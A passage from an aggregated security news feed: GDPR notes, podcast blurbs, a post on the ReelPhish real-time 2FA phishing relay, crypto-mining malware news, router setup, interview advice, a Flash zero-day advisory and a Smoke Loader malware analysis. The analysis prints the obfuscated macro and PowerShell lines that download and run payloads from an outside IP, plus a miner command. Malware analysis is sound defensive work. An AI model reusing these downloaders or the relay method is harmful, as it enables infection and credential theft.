format or switch up would allow them to showcase that more efficiently.

GDPR Material and Territorial Scopes

The new EU General Data Regulation will enter into force 25 May of this year. The GDPR contains rules concerning the protection of natural persons when their personal data are processed and rules on the free movement of personal data. The new regulation is not revolutionary but an evolution from the previous Data Protection Act 1998 […]

GDPR Preparation: Recent Articles of Note

Company preparations for GDPR compliance are (or should be!) in full swing with the 25th May enforcement date fast looming on the horizon. With that in mind, I found the following set of recent GDPR articles a decent and interesting read. The list was compiled by Brian Pennington of Coalfire, he has kindly allowed me to repost.

If you are after further GDPR swatting up, you could always read the actual regulation EU General Data Protection Regulation (EU-GDPR), and don't forget to read all the Recitilies.

If you have any offer GDPR related articles or blogs of note, please post in the comments.

Heinous Noises – Enterprise Security Weekly #79

This week, Paul is joined by Doug White, host of Secure Digital Life, to interview InfoSecWorld 2018 Speaker Summer Fowler! In the news, we have updates from Cisco, SANS, Scarab, and more on this episode of Enterprise Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

ReelPhish: A Real-Time Two-Factor Phishing Tool

Social Engineering and Two-Factor Authentication

Social engineering campaigns are a constant threat to businesses because they target the weakest chain in security: people. A typical attack would capture a victim’s username and password and store it for an attacker to reuse later. Two-Factor Authentication (2FA) or Multi-Factor Authentication (MFA) is commonly seen as a solution to these threats.

2FA adds an extra layer of authentication on top of the typical username and password. Two common 2FA implementations are one-time passwords and push notifications. One-time passwords are generated by a secondary device, such as a hard token, and tied to a specific user. These passwords typically expire within 30 to 60 seconds and cannot be reused. Push notifications involve sending a prompt to a user’s mobile device and requiring the user to confirm their login attempt. Both of these implementations protect users from traditional phishing campaigns that only capture username and password combinations.

Real-Time Phishing

While 2FA has been strongly recommended by security professionals for both personal and commercial applications, it is not an infallible solution. 2FA implementations have been successfully defeated using real-time phishing techniques. These phishing attacks involve interaction between the attacker and victims in real time.

A simple example would be a phishing website that prompts a user for their one-time password in addition to their username and password. Once a user completes authentication on the phishing website, they are presented with a generic “Login Successful” page and the one-time password remains unused but captured. At this point, the attacker has a brief window of time to reuse the victim’s credentials before expiration.

Social engineering campaigns utilizing these techniques are not new. There have been reports of real-time phishing in the wild as early as 2010. However, these types of attacks have been largely ignored due to the perceived difficulty of launching such attacks. This article aims to change that perception, bring awareness to the problem, and incite new solutions.

Explanation of Tool

To improve social engineering assessments, we developed a tool – named ReelPhish – that simplifies the real-time phishing technique. The primary component of the phishing tool is designed to be run on the attacker’s system. It consists of a Python script that listens for data from the attacker’s phishing site and drives a locally installed web browser using the Selenium framework. The tool is able to control the attacker’s web browser by navigating to specified web pages, interacting with HTML objects, and scraping content.

The secondary component of ReelPhish resides on the phishing site itself. Code embedded in the phishing site sends data, such as the captured username and password, to the phishing tool running on the attacker’s machine. Once the phishing tool receives information, it uses Selenium to launch a browser and authenticate to the legitimate website. All communication between the phishing web server and the attacker’s system is performed over an encrypted SSH tunnel.

Victims are tracked via session tokens, which are included in all communications between the phishing site and ReelPhish. This token allows the phishing tool to maintain states for authentication workflows that involve multiple pages with unique challenges. Because the phishing tool is state-aware, it is able to send information from the victim to the legitimate web authentication portal and vice versa.


We have successfully used ReelPhish and this methodology on numerous Mandiant Red Team engagements. The most common scenario we have come across is an externally facing VPN portal with two-factor authentication. To perform the social engineering attack, we make a copy of the real VPN portal’s HTML, JavaScript, and CSS. We use this code to create a phishing site that appears to function like the original.

To facilitate our real-time phishing tool, we embed server-side code on the phishing site that communicates with the tool running on the attacker machine. We also set up a SSH tunnel to the phishing server. When the authentication form on the phishing site is submitted, all submitted credentials are sent over the tunnel to the tool on the attacker’s system. The tool then starts a new web browser instance on the attacker’s system and submits credentials on the real VPN portal. Figure 1 shows this process in action.

Figure 1: ReelPhish Flow Diagram

We have seen numerous variations of two-factor authentication on VPN portals. In some instances, a token is passed in a “secondary password” field of the authentication form itself. In other cases, the user must respond to a push request on a mobile phone. A user is likely to accept an incoming push request after submitting credentials if the phishing site behaved identically to the real site.

In some situations, we have had to develop more advanced phishing sites that can handle multiple authentication pages and also pass information back and forth between the phishing web server and the tool running on the attacking machine. Our script is capable of handling these scenarios by tracking a victim’s session on the phishing site and associating it with a particular web browser instance running on the attacker’s system. Figure 1 shows a general overview of how our tool would function within an attack scenario.

We are publicly releasing the tool on the FireEye GitHub Repository. Feedback, pull requests, and issues can also be submitted to the Git repository.


Do not abandon 2FA; it is not a perfect solution, but it does add a layer of security. 2FA is a security mechanism that may fail like any other, and organizations must be prepared to mitigate the impact of such a failure.

Configure all services protected by 2FA to minimize attacker impact if the attacker successfully bypasses the 2FA protections. Lowering maximum session duration will limit how much time an attacker has to compromise assets. Enforcing a maximum of one concurrent session per user account will prevent attackers from being active at the same time as the victim. If the service in question is a VPN, implement strict network segmentation. VPN users should only be able to access the resources necessary for their respective roles and responsibilities. Lastly, educate users to recognize, avoid, and report social engineering attempts.

By releasing ReelPhish, we at Mandiant hope to highlight the need for multiple layers of security and discourage the reliance on any single security mechanism. This tool is meant to aid security professionals in performing a thorough penetration test from beginning to end.

During our Red Team engagements at Mandiant, getting into an organization’s internal network is only the first step. The tool introduced here aids in the success of this first step. However, the overall success of the engagement varies widely based on the target’s internal security measures. Always work to assess and improve your security posture as a whole. Mandiant provides a variety of services that can assist all types of organizations in both of these activities.

Crypto-Mining Malware May Be a Bigger Threat than Ransomware

Crypto-Mining Malware is Crippling Enterprise Networks

Cryptocurrencies such as Bitcoin and Ethereum have gone mainstream; it seems like everybody and their brother is looking to buy some crypto and get their piece of the digital currency gold rush. Hackers want a piece of it, too. In addition to hacking ICO’s and cryptocurrency exchanges, they’re using crypto-mining malware to “mine” their own “coins.”

Crypto-Mining Malware May Be a Bigger Threat than Ransomware

Crypto-mining malware isn’t new; last summer, this blog reported on a crypto-mining malware variant called Adylkuzz that came to light in the wake of the WannaCry attacks. Adylkuzz took advantage of the same Windows exploit as WannaCry. In fact, it acted as a sort of “vaccine” against the ransomware, preventing it from taking root in Adylkuzz-infected computers lest it interfere with its Monero-mining operations. However, Adylkuzz wasn’t a kinder, gentler malware. While it didn’t directly lock down systems or access data, it did hijack infected machines’ processing power, and it proved to be far more lucrative than WannaCry; it’s estimated that Adylkuzz raked in 10 times more money for its users than WannaCry.

At first, rogue crypto-miners were viewed as an annoyance; the most they did was slow down machines and perhaps cause problems accessing certain network folders. They were also seen as more of a threat to consumers than businesses. Many variants went after IoT devices, such as smartphones, overwhelming their processors to the point where the devices could be damaged or even destroyed. However, as crypto-mining malware has evolved, it has become more sophisticated, and hackers are looking to harvest enterprise processing power.

Move Over, WannaCry; Here Comes WannaMine

Recently, Dark Reading reported on yet another exploit of the Eternal Blue tool stolen from the NSA, a crypto-mining malware variant dubbed WannaMine. WannaMine doesn’t attack smartphones and other small IoT devices; it goes after Windows computers, and isn’t just slowing systems down. Security firm CrowdStrike reports having seen it cause “applications and hardware to crash, causing operational disruptions lasting days and sometimes even weeks.”

A report in Security Week elaborates on how WannaMine appears to be designed to specifically target enterprise networks:

WannaMine, the security researchers explain, employs “living off the land” techniques for persistence, such as Windows Management Instrumentation (WMI) permanent event subscriptions. The malware has a fileless nature, leveraging PowerShell for infection, which makes it difficult to block without the appropriate security tools.

The malware uses credential harvester Mimikatz to acquire legitimate credentials that would allow it to propagate and move laterally. If that fails, however, the worm attempts to exploit the remote system via EternalBlue.

To achieve persistence, WannaMine sets a permanent event subscription that would execute a PowerShell command located in the Event Consumer every 90 minutes.

The malware targets all Windows versions starting with Windows 2000, including 64-bit versions and Windows Server 2003. However, it uses different files and commands for Windows Vista and newer platform iterations.

WannaMine isn’t the only crypto-mining malware harnessing Eternal Blue and using the Windows Management Infrastructure to propagate. Another Monero-mining worm, dubbed Smominru (aka Ismo), has infected over a half a million Windows hosts, most of them servers.

These “next-generation” crypto-mining malware variants have proven extremely difficult to take down. First, the malware is distributed. Second, even if all machines on a network are patched against Eternal Blue, the malware will seek to use the Mimikatz credential harvester to get in by cracking a weak password. Finally, some legacy antivirus products do not detect crypto-mining malware because it doesn’t actually write files to an infected machine’s disk.

Protecting Your Organization Against WannaMine and Other Crypto-Mining Malware

There are several ways to protect your enterprise systems from being hijacked for illegal crypto-mining:

  • Keep your systems and software up-to-date; only older Windows machines are susceptible to the Eternal Blue exploit.
  • Use network security software to monitor for and block the activity needed for crypto-miners to work.
  • Ensure that all system users are using strong passwords that cannot be cracked by Mimikatz.

In addition to doing damage to enterprise systems, crypto-mining malware can be employed by real-world threat actors to fund their criminal activity. It’s in everyone’s best interest to put a stop to it.

The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.

Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems.

The post Crypto-Mining Malware May Be a Bigger Threat than Ransomware appeared first on .

How to configure a Mikrotik router as DHCP-PD Client (Prefix delegation)

Over time more and more IPS provide IPv6 addresses to the router (and the clients behind it) via DHCP-PD. To be more verbose, that’s DHCPv6 with Prefix delegation delegation. This allows the ISP to provide you with more than one subnet, which allows you to use multiple networks without NAT. And forget about NAT and IPv6 – there is no standardized way to do it, and it will break too much.  The idea with PD is also that you can use normal home routers and cascade them, which requires that each router provides a smaller prefix/subnet to the next router. Everything should work without configuration – that was at least the plan of the IETF working group.

Anyway let’s stop with the theory and provide some code. In my case my provider requires my router to establish a pppoe tunnel, which provides my router an IPv4 automatically. In my case the config looks like this:

/interface pppoe-client add add-default-route=yes disabled=no interface=ether1vlanTransitModem name=pppoeDslInternet password=XXXX user=XXXX

For IPv6 we need to enable the DHCPv6 client with following command:

/ipv6 dhcp-client add interface=pppoeDslInternet pool-name=poolIPv6ppp use-peer-dns=no

But a check with

/ipv6 dhcp-client print

will only show you that the client is “searching…”. The reason for this is that you most likely block incoming connections from the Internet – If you don’t filter –> bad boy! :-). You need to allow DHCP replies from the server.

/ipv6 firewall filter add chain=input comment="DHCPv6 server reply" port=547 protocol=udp src-address=fe80::/10

Now you should see something like this

In this case we got a /60 prefix delegated from the ISP, which counts for 16 /64 subnets. The last step you need is to configure the IP addresses on your internal networks. Yes, you could just statically add the IP addresses, but if the provider changes the subnet after an disconnect, you need to reconfigure it again. Its better configure the router to dynamically assign the IP addresses delegated to the internal interfaces. You just need to call following for each of your internal interfaces:

/ipv6 address add from-pool=poolIPv6ppp interface=vlanInternal

Following command should show the currently assigned prefixes to the various internal networks

/ipv6 address print

Hey, IPv6 is not that complicated. 🙂

Put Your Dockers On – Business Security Weekly #72

This week, Michael and Paul interview Vik Desai, Managing Director at Accenture! Matt Alderman and Asif Awan of Layered Insight join Michael and Paul for another interview! In the news, we have updates from BehavioSec, RELX, DISCO, Logikcull, and more on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Stay Classy – Application Security Weekly #04

This week, Keith and Paul discuss OWASP Application Security Verification Standard! In the news, Intel warns Chinese companies of chip flaw before U.S. government, bypassing CloudFair using Internet-wide scan data, and more on this episode of Application Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

Ten things you may reveal during job interview (Response to Forbes Article)

Ten things you may reveal during job interview (Response to Forbes Article)

In continuation to my recent articles on preparation for the interview, and few pointers to make perform better during the interview, I stumbled on an article at Forbes - Ten Things Never, Ever to reveal in a job interview by Liz Ryan. I agree with some of the pointers she voiced, but few might hurt the employee/employer relationship in the long run or may even be considered borderline unethical. This blog-post is an attempt to share my humble opinion while having experience as an entrepreneur & employee. Please read it with a pinch of salt, and do share your comments.

As per Forbes article, ten things to keep to yourself (and my opinions alongwith),

  1. The fact that you got fired from your last job -- or any past job.
    Yes, this is irrelevant and can be avoided in the interview.
    But, if your firing included a legal case against you, or something that the new employer may find in the background check, or police verification; it's better to come clean at the start than being embarrassed later.

  2. The fact that your last manager (or any past manager) was a jerk, a bully, a lousy manager or an idiot, even if all those things were true.
    No need to mention that. No one likes to interview a candidate that bitches of the old colleagues or managers.
    It may only be acceptable to an extent if it has resulted in harassment case and you have taken the "justifiable" decision to leave the firm based on how they treated you.

  3. The fact that you are desperate for a job. Some companies will be turned off by this disclosure, and others will use it as a reason to low-ball you.
    I agree here. Keep the leverage of negotiating the terms with yourself & don't expose all your cards.

  4. The fact that you feel nervous or insecure about parts of the job if you're applying for. You don't want to be cocky and say "I can do this job in my sleep!" but you also don't want to express the idea that you are worried about walking into the new job. Don't worry! Everyone is worried about every new job, until you figure out that everyone is faking it anyway so you may as well fake it, too.
    Okay, I do agree with the pointer here, but if you are insecure or feeling nervous than you might as well give this position a rethought. Pursue a role you are confident to manage and don't manipulate the interviewer by showing "confidence" when you have no idea of its role & responsibilities. Don't express the nervous jitters of the new job, nor be cocky with overconfidence. But, be true to yourself and the employer if the assignment is well in your forte.

  5. The fact that you had a clash or conflict with anybody at a past job or that you got written up or put on probation. That's no one's business but yours.
    It is on the same grounds as you being fired in your last job or your relationship with your x-manager. Chose sensibly as there's no black & white answer to handling this situation without knowing the complete context. There can be scenarios when you may want to tell the interviewer (example: if your old company may well be the client of the new firm, and you may be allocated to this project (TRUE STORY))

  6. The fact that you have a personal issue going on that could create scheduling difficulty down the road. Keep that to yourself unless you already know that you need accommodation, and you know what kind of accommodation you need. Otherwise, button your lip. Life takes its own turns. Who knows what will happen a few months from now?
    Okay, this I don't agree 100% as being an entrepreneur, I would like my employee or hiring candidate to be right to me if they have an ongoing commitment or something that might come up. Most of the companies hire candidates with few weeks of the probation period, or a company may even fire you if you intentionally kept your planned "engagement" with the firm.
    There is a change in the outlook of companies, and they would appreciate if you keep them in the loop of ongoing personal issues (briefly) so they can expect the right amount of deliverables. Else, your performance and scheduling may well slide off the track which can cause you problems in the long run.

  7. The fact you're pregnant, unless you already telling people you don't know well (like the checker at the supermarket). A prospective employer has no right to know the contents of your uterus. It is none of their business.
    I have a different opinion on this, and my answer depends on the which trimester you are in. If you are in the first trimester, and by God's grace doing well, telling the employer is your choice. Keep in mind that if the employer is unaware of your health status; they may not be able to judge the kind of workload which is "healthy" for you or that you have a medical reason for not doing overtime etc.
    Being in the 2nd trimester, you have to be careful, and you should tell the employer about your condition. It will not be well appreciated that after joining for a month, you may go on maternity leave. I mean employer may as well have commitments on the ongoing projects and deadlines.
    And if you are in the 3rd trimester, I would recommend you to enjoy your pregnancy and don't stress about looking out for new job, projects and deadlines. You have a much more significant responsibility and full-time job for few months.

  8. The fact that this job pays a lot more than the other jobs you've held. That information is not relevant and will only hurt you.
    Yes, I agree. Every situation and employer must have their range of compensation, and the only thing you have to consider is if that's enough for you; independently of your last paycheck or other jobs.

  9. The fact that you are only planning to remain in your current city for another year or some other period of time. That fact alone will cause many companies not to hire you. They want to retain the right to fire you for any reason or no reason, at any moment -- but they can't deal with the fact that you have your own plans, too -- and that people don't always take a job with the intention of staying in the job forever.
    If you are planning to stay in the city for a year, and then move; let the employer know about it. Understand your relationship with the employer is mutual, and you would expect the same from it. What if the employer is closing the office in six months and the hire you "hiding this fact", and then let you go in six months. I mean we don't have to lie to each other to hire the perfect person or land the ideal job.

  10. The fact that you know you are overqualified for the job you're interviewing for, and that your plan is to take the job and quickly get promoted to a better job. For some reason, many interviewers find this information off-putting. I have been to countless HR gatherings where I heard folks complaining about "entitled" or "presumptuous" job applicants who had the nerve to say "This job is just a stepping stone for me." How dare they!
    Without a doubt, I agree. But if you are overqualified for the job, or you think you may as well get bored, think again before saying yes to the employer. Refer my previous articles on preparation and performance.

In general when I appear for the interview, or if I interview someone; I prefer to be straightforward of my current conditions, and expect the same from the employer. The working relationship is essential and must not start with hiding information that can impact your performance. You will spend 1/3rd of your life at your workplace, and I don't think you want to kick off my keeping the critical facts hidden. Think before you hide something - whether it will shock your employer, or surprise them and how well they would react to it, is disclosed.

Employee or Employer, both have their commitments and deadlines. The person taking your interviews, or the one managing you have to know if you have some hiccups along the way else their performance may also impact because of you. So, think of these pointers again and do share what you feel is necessary to set the right expectations.

Cheers, and best wishes.

This article shares my opinions, and by no means an offence to the Forbes article. Please take it with a pinch of salt.

Hopefully Intel is working on hardware solution of…

Hopefully Intel is working on hardware solution of this flaw. Obvious solution is adding fully isolated device that performs scheduled encryption for all sensitive information, (that does not used for computation anyway), then decryption is done only when request is longer then access time of meltdown.. Such solution will help not only for Meltdown, but also for any attempt to get password without touching keyboard.

It Was Wide Open – Paul’s Security Weekly #546

This week, InfoSecWorld speakers Mark Arnold & Will Gragido join us for an interview! John Strand of Black Hills Information Security joins us for the Technical Segment on MITRE! In the news, we have updates from Discord, Bitcoin, NSA, Facebook, and more on this episode of Paul's Security Weekly!

Full Show Notes:

Visit for all the latest episodes!

Attacks Leveraging Adobe Zero-Day (CVE-2018-4878) – Threat Attribution, Attack Scenario and Recommendations

On Jan. 31, KISA (KrCERT) published an advisory about an Adobe Flash zero-day vulnerability (CVE-2018-4878) being exploited in the wild. On Feb. 1, Adobe issued an advisory confirming the vulnerability exists in Adobe Flash Player and earlier versions, and that successful exploitation could potentially allow an attacker to take control of the affected system.

FireEye began investigating the vulnerability following the release of the initial advisory from KISA.

Threat Attribution

We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper. We have observed TEMP.Reaper operators directly interacting with their command and control infrastructure from IP addresses assigned to the STAR-KP network in Pyongyang. The STAR-KP network is operated as a joint venture between the North Korean Government's Post and Telecommunications Corporation and Thailand-based Loxley Pacific. Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year. They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors.

In the past year, FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper, which we detect as RUHAPPY. While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks, we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets.

Attack Scenario

Analysis of the exploit chain is ongoing, but available information points to the Flash zero-day being distributed in a malicious document or spreadsheet with an embedded SWF file. Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third party websites hosted in South Korea. Preliminary analysis indicates that the vulnerability was likely used to distribute the previously observed DOGCALL malware to South Korean victims.


Adobe stated that it plans to release a fix for this issue the week of Feb. 5, 2018. Until then, we recommended that customers use extreme caution, especially when visiting South Korean sites, and avoid opening suspicious documents, especially Excel spreadsheets. Due to the publication of the vulnerability prior to patch availability, it is likely that additional criminal and nation state groups will attempt to exploit the vulnerability in the near term.

FireEye Solutions Detections

FireEye Email Security, Endpoint Security with Exploit Guard enabled, and Network Security products will detect the malicious document natively. Email Security and Network Security customers who have enabled the riskware feature may see additional alerts based on suspicious content embedded in malicious documents. Customers can find more information in our FireEye Customer Communities post.

Cyber Security Roundup for January 2018

2018 started with a big security alert bang after Google Security Researchers disclosed serious security vulnerabilities in just about every computer processor in use on the planet. Named 'Meltdown' and 'Spectre’, when exploited by a hacker or malware, these vulnerabilities disclose confidential data. As a result, a whole raft of critical security updates was hastily released for computer and smartphone operating systems, web browsers, and processor drivers. While processor manufacturers have been rather lethargic in reacting and producing patches for the problem, software vendors such as Microsoft, Google and Apple have reacted quickly, releasing security updates to protect their customers from the vulnerable processors, kudos to them.

The UK Information Commission's Office (ICO) heavily criticised the Carphone Warehouse for security inadequacies and fined the company £400K following their 2015 data breach, when the personal data, including bank details, of millions of Carphone Warehouse customers, was stolen by hackers, in what the company at the time described as a "sophisticated cyber attack", where have we heard that excuse before? Certainly the ICO wasn't buying that after it investigated, reporting a large number Carphone Warehouse's security failures, which included the use of software that was six years out of day,  lack of “rigorous controls” over who had login details to systems; no antivirus protection running on the servers holding data, the same root password being used on every individual server, which was known to “some 30-40 members of staff”; and the needless storage of full credit card details. The Carphone Warephone should thank their lucky stars the breach didn't occur after the General Data Protection Regulation comes into force, as with such a damning list of security failures, the company may well have been fined considerably more by ICO, when it is granted vastly greater financial sanctions and powers when the GDPR kicks in May.

The National Cyber Security Centre warned the UK national infrastructure faces serious nation-state attacks, stating it is a matter of a "when" not an "if". There also claims that the cyberattacks against the Ukraine in recent years was down to Russia testing and tuning it's nation-state cyberattacking capabilities. 

At the Davos summit, the Maersk chairman revealed his company spent a massive £200m to £240m on recovering from the recent NotPeyta ransomware outbreak, after the malware 'totally destroyed' the Maersk network. That's a huge price to pay for not regularly patching your systems.

It's no surprise that cybercriminals continue to target cryptocurrencies given the high financial rewards on offer. The most notable attack was a £290k cyber-heist from BlackWallet, where the hackers redirected 700k BlackWallet users to a fake replica BlackWallet website after compromising BlackWallet's DNS server. The replica website ran a script that transferred user cryptocurrency into the hacker's wallet, the hacker then moved currency into a different wallet platform.

In the United States, 
the Federal Trade Commission (FTC) fined toy firm VTech US$ 650,000 (£482,000) for violating a US children's privacy laws. The FTC alleged the toy company violated (COPPA) Children's Online Privacy Protection Rule by collecting personal information from hundreds of thousands of children without providing direct notice.

It was reported that a POS malware infection at Forever21 and lapses in encryption was responsible for the theft of debit and credit card details from Forever21 stores late last year. Payment card data continues to be a high valued target for cyber crooks with sophisticated attack capabilities, who are willing to invest considerable resources to achieve their aims.

Several interesting cybersecurity reports were released in January,  the Online Trust Alliance Cyber Incident & Breach Trends Report: 2017 concluded that cyber incidents have doubled in 2017 and 93% were preventable. Carbon Black's 2017 Threat Report stated non-malware-based cyber-attacks were behind the majority of cyber-incidents reported in 2017, despite the proliferation of malware available to both the professional and amateur hackers. Carbon Black also reported that ransomware attacks are inflicting significantly higher costs and the number of attacks skyrocketed during the course of the year, no surprise there.  

Malwarebytes 2017 State of Malware Report said ransomware attacks on consumers and businesses slowed down towards the end of 2017 and were being replaced by spyware campaigns, which rose by over 800% year-on-year. Spyware campaigns not only allow hackers to steal precious enterprise and user data but also allows them to identify ideal attack points to launch powerful malware attacks. The Cisco 2018 Privacy Maturity Benchmark Study claimed 74% of privacy-immature organisations were hit by losses of more than £350,000, and companies that are privacy-mature have fewer data breaches and smaller losses from cyber-attacks.




Declaring War on Cyber Terrorism…or Something Like That

This post is co-authored by Deana Shick, Eric Hatleback and Leigh Metcalf

Buzzwords are a mainstay in our field, and "cyberterrorism" currently is one of the hottest. We understand that terrorism is an idea, a tactic for actor groups to execute their own operations. Terrorists are known to operate in the physical world, mostly by spreading fear with traditional and non-traditional weaponry. As information security analysts, we also see products where "terrorists" are ranked in terms of sophistication, just like any other cyber threat actor group. But how does the definition of "terrorism" change when adding the complexities of the Internet? What does the term "cyber terrorism" actually mean?

We identified thirty-seven (37) unique definitions of "cyber terrorism" drawn from academic and international-relations journals, the web, and conference presentations. These definitions date back as far as 1998, with the most recent being published in 2016. We excluded any circular definitions based on the findings in our set. We broke down these definitions into their main components in order to analyze and compare definitions appropriately. The definitions, as a whole, broke into the following thirteen (13) categories, although no single definition included all of them at once:

  • Against Computers: Computers are a necessary target of the action.
  • Criminals: Actions performed are criminal acts, according to the relevant applicable law.
  • Fear: The action is intended to incite fear in the victims.
  • Hacking: The attempt to gain unauthorized access into a targeted network.
  • Religion: Religious tenants are a motivator to perform actions.
  • Socially Motivated: Social constructs motivate to perform action on objectives.
  • Non-State Actors: Individuals or groups not formally allied to a recognized country or countries.
  • Politics: The political atmosphere and other occurances within a country or countries motivate action.
  • Public Infrastructure: Government-owned infrastructure is a target of the action.
  • Against the public: Actions performed against a group of people, many of which are bystanders.
  • Terrorism: Violence perputrated by individuals to intimidate others into action.
  • Using Computers: Computers are used during actions on objectives.
  • Violence: The use of force to hurt or damage a target.

After binning each part of the definitions into these categories, we found that there is no consensus definition for "cyber terrorism." Our analysis of each definition is found in Figure 1. A factor that might explain the diversity of opinions could be the lack of a singular, agreed upon definition for "terrorism" on the international stage, even before adding the "cyber" adjective. So, what does this mean for us?

In the information security field, vendors, analysts, and researchers tend to slap the term "cyber" onto any actions involving an internet connection. While this may be appropriate in some cases, terrorism does not seem to translate well into bytes and packets. Perhaps this is due to the physical, visceral nature that terrorists require to be successful, or perhaps it is due to the lack of a true use-case of a terrorist group successfully detonating a computer. We should remain mindful as a community not to perpetuate fear, uncertainty, or doubt by using terms and varying adjectives without a common understanding.


Figure 1: Definitions found based on common bins


CUTV News Radio spotlights Michael Peters of Lazarus Alliance

CUTV News Radio spotlights Michael Peters of Lazarus Alliance

CUTV News Radio with veteran award-winning broadcast TV and radio hosts/media personalities Jim Masters and Doug Llewelyn is an exciting, informative, entertaining, thought-provoking and empowering broadcast series featuring several LIVE episodes daily and is a service of the Telly-award winning CUTV News, a full service media company that provides entrepreneurs, business owners and extraordinary people a platform to share their story worldwide.

The post CUTV News Radio spotlights Michael Peters of Lazarus Alliance appeared first on .

How to eliminate the default route for greater security

If portions of enterprise data-center networks have no need to communicate directly with the internet, then why do we configure routers so every system on the network winds up with internet access by default?

Part of the reason is that many enterprises use an internet perimeter firewall performing port address translation (PAT) with a default policy that allows access the internet, a solution that leaves open a possible path by which attackers can breach security.

+Also on Network World: IPv6 deployment guide; What is edge computing and how it’s changing the network?+

To read this article in full, please click here

(Insider Story)

Growing North Korean cyber capability

Recent missile launches from the DPRK have received a lot of attention, however their cyber offensives have also been active and are growing in sophistication. North Korean cyber attack efforts involve around 6,000 military operatives, within the structure of the Reconnaissance General Bureau (RGB) – part of the military of which Kim Jong-un is supreme …

Tactical Sweaters – Enterprise Security Weekly #78

This week, Paul and John interview Brendan O'Connor, Security CTO at ServiceNow, and John Moran, Senior Project Manager of DFLabs! In the news, we have updates from Twistlock, Microsoft, BeyondTrust, and more on this episode of Enterprise Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

Smoke Loader Campaign: When Defense Becomes a Numbers Game

Authored by Alexander Sevtsov
Edited by Stefano Ortolani


Everybody knows that PowerShell is a powerful tool to automate different tasks in Windows. Unfortunately, many bad actors know that it is also a sneaky way for malware to download its payload. A few days ago we stumbled upon an interesting macro-based document file (sha1: b73b0b80f16bf56b33b9e95e3dffc2a98b2ead16) that is making one too many assumptions about the underlying operating system, thus sometimes failing to execute.

The Malicious Document

The malicious document file consists of the following macro code:

Private Sub Document_Open()
    Dim abasekjsh() As Byte, bfjeslksl As String, izhkaheje As Long
    abasekjsh = StrConv(ThisDocument.BuiltInDocumentProperties(Chr(84) + Chr(105) + Chr(116) + 
Chr(108) + Chr(101)), vbFromUnicode)
    For izhkaheje = 0 To UBound(abasekjsh)
        abasekjsh(izhkaheje) = abasekjsh(izhkaheje) - 6
    Next izhkaheje
    bfjeslksl = StrReverse(StrConv(abasekjsh, vbUnicode))
    Shell (Replace(Replace(Split(bfjeslksl, "|")(1), Split(bfjeslksl, "|")(0), Chr(46)), 
"FPATH", ActiveDocument.Path & Application.PathSeparator & ActiveDocument.Name)), 0
End Sub

The macro itself is nothing special: it first reads the “Title” property by accessing the BuiltInDocumentProperties of the current document. The property value is then used to decode a PowerShell command line, which is eventually executed via the Shell method.

The PowerShell Downloader

Instead of using sophisticated evasion techniques, the malware relies on a feature available from PowerShell 3.0 onwards. To download the malicious code the command invokes the Invoke-WebRequest cmdlet:

powershell.exe -w 1 Invoke-WebRequest -Uri http://80.82.67[.]217/poop.jpg -OutFile 
([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');powershell.exe -w 1 Start-Process -
Filepath ([System.IO.Path]::GetTempPath()+'\DKSPKD.exe');

This tiny detail has the side-effect of requiring Windows 8 and above for the command to complete successfully. Note that although PowerShell comes installed by default since Windows 7, PowerShell 3.0 is only available on Windows 7 as an optional update. Therefore any network activity can only be observed if the underlying operating system is at least Windows 8, or if Windows 7 has the specific update installed. In other words, the more diversity between our analysis environments, the more chances we can elicit the malicious behavior.

Payload – Smoke Loader

The payload is a variant of the Smoke Loader family (Figure 1) which shows quite a number of different activities when analyzed by the Lastline sandbox (sha1: f227820689bdc628de34cc9c21000f3d458a26bf):

Figure 1. Analysis overview of the Smoke Loader

As it often happens, signatures are not really informative as we can see in Figure 2.

Figure 2. VT detection of the Smoke Loader

The aim of this malware is to download other components by sending 5 different POST requests to microsoftoutlook[.]bit/email/send.php. While some are met with a 404 error, three are successful and download the following payloads:

  • GlobeImposter Ransomware eventually displaying the ransom note in Figure 3.
    Smoke Loader Ransom Note

    Figure 3. Ransom note of the GlobeImposter Ransomware delivered by the Smoke Loader.

  • Zeus trojan banker, also known as Zbot, capturing online banking sessions and stealing credentials from known FTP clients, such as FlashFXP, CuteFtp, WsFTP, FileZilla, BulletProof FTP, etc.
  • Monero CPU miner based on the open source XMRig project (as indicated by some of the strings included in the binary, see Figure 4). The command used to spawn the miner reveals some well-known pool id we have been seeing already:

wuauclt.exe -o stratum+tcp:// -u 
4FbnHbJZ2tAqPas12PV5F6te.smoke30+10000 -p x --safe

Figure 4. XMRig Monero CPU miner


It’s worth mentioning that it’s not the first time we have seen the IP address from which the loader is downloaded. Based on our intelligence records, another malicious VBA-based document file (sha1: 03a06782e60e7e7b724a0cafa19ee6c64ba2366b) called a similar PowerShell script that perfectly executed in a default Windows 7 installation:

powershell $webclient = new-object System.Net.WebClient;
$myurls = 'http://80.82.67[.]217/moo.jpg'.Split(',');
$path = $env: temp + '\~tmp.exe';
foreach($myurl in $myurls) {
    try {
        $webclient.DownloadFile($myurl.ToString(), $path);
        Start-Process $path;
    } catch {}

This variant downloads the payload by invoking the DownloadFile method from the System.Net.WebClient class, indeed a much more common (and backward compatible) approach to retrieve a remote resource.


There is an inherent problem with dynamic analysis: which version of the underlying operating system should be used? To address this issue, the Lastline engine is capable of running deep behavioral analysis on several different operating systems, increasing the probability of a successful execution. Moreover, application bundles (see previous article for more details) can be further used to shape the analysis environment when additional requirements are needed to elicit the malicious behavior.

